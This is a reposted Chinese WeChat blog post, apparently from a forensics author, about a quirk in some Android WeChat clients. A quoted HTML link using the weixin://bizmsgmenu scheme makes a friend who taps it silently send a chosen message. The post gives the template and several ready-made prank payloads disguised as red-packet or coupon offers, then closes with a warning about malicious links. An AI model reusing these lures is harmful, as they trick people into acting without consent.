【数据安全篇】微信”引用”消息变成私信好友XSS整蛊

发布于 作者:

原文链接: https://mp.weixin.qq.com/s?__biz=MzI2MTUwNjI4Mw==&mid=2247489684&idx=1&sn=c2b5dfe499bbfe0a1ac672d8a12332ee

【数据安全篇】微信”引用”消息变成私信好友XSS整蛊

原创 蘇小沐 DFIR蘇小沐 2025-07-13 07:00

1

使用方法:”引用”消息,发送代码

不管是微信
群聊还是私聊,只要
引用微信消息然后发这段

HTML代码”,别人
点击这个消息
后,就会自动
私信发送给好友!!!
并不会切换到好友聊天界面,是无感的,所以操作需要谨慎!!!

目前只对部分Android系统有用,电脑端和iOS端都会显示源码!

Android端:显示源码,有
超链接蓝色字体。

【数据安全篇】微信

Windows电脑端

【数据安全篇】微信

好友显示:

【数据安全篇】微信

【数据安全篇】微信

2

源码:直接”引用” 群/好友消息,粘贴源码即可

里面的文字可根据场景自定义替换:

【数据安全篇】微信 

<a 
href=&#34;weixin://bizmsgmenu
?msgmenucontent=【实际发送的信息】
&msgmenuid=960&#34;>【显示的信息】</a >

<a

href=”weixin://bizmsgmenu

?msgmenucontent=你是我见过最帅的人

&msgmenuid=960″>点击领取红包
🧧

<a

href=”weixin://bizmsgmenu

?msgmenucontent=把你的不开心通通赶走

&msgmenuid=960″>点击有惊喜

<a

href=”weixin://bizmsgmenu

?msgmenucontent=爸爸

&msgmenuid=960″>点击领取今日份红包
🧧

<a

href=”weixin://bizmsgmenu

?msgmenucontent=你是我见过最帅的人

&msgmenuid=960″>点击领取美团大额优惠券
🧧

<a

href=”weixin://bizmsgmenu

?msgmenucontent=哎,又被骗了,我要加强学习了,也送你一份学习资料
https://flk.npc.gov.cn/index.html

&msgmenuid=960″>点击领取红包🧧 

3

注意事项

增强防范安全
:如果是替换的是
超链接/病毒链接/获取位置信息等……
,是否会自动下载安装病毒文件、获取手机数据、位置信息等,造成数据泄露等风险。

陌生信息不要乱点!!!

书写片面,纯粹做个记录,有错漏之处欢迎指正!

【声明:欢迎转发收藏,个人创作不易,喜欢记得点点赞!!!转载引用请注明出处,著作所有权归 [蘇小沐] 所有】

【注:共享资源收集于官网或互联网公开材料,仅供学习研究,如有侵权请联系删除,谢谢!】

记录
开始编辑:2025年 07月 13日
最后编辑:2025年 07月 13日

END

关注我,了解更多取证知识,记得点赞+在
看!【数据安全篇】微信

【数据安全篇】微信